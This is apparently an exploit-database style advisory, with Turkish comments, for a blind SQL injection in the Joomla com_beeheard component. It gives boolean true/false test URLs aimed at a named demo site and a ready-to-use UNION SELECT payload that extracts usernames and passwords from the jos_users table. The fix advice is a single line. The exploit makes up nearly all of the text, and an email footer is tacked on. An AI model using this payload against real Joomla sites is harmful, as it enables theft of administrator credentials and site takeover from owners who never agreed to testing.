The Joomla Beeheard component suffers from a remote blind SQL Injection vulnerability.
e6830ebf958b34f5b9a4fe12e9001e3ebe17c1153a72dbbf8918e1b8e7689cf6
<------------------- header data start ------------------- >
[++] Joomla Component com_beeheard Blind SQL injection Vulnerability
[++] author : FL0RiX
[++] Name : com_beeheard
[++] Bug Type : (Blind) SQL Injection
[++] Infection : Admin login bilgileri alýnabilir.
[++] Demo Vuln. :
TRUE(+)
»
http://beeheard.cmstactics.com/index.php?option=com_beeheard&controller=suggestions&view=suggestions&layout=list&category_id=2
and 1=1
FALSE(-)
»
http://beeheard.cmstactics.com/index.php?option=com_beeheard&controller=suggestions&view=suggestions&layout=list&category_id=2
and 1=0
[++] Bug Fix Advice : Zararlý karakterler filtrelenmelidir.
< ------------------- header data end of ------------------- >
< -- bug code start -- >
path/index.php?option=com_beeheard&controller=suggestions&view=suggestions&layout=list&category_id=null/**/and/**/1=0/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixforever,5,6,7,8,9/**/from/**/jos_users--
< -- bug code end of -- >
_________________________________________________________________
Windows Live: Arkadaþlarýnýz size e-posta gönderdiklerinde Flickr, Twitter ve Digg'deki hareketlerinizi görürler.
http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_3:092010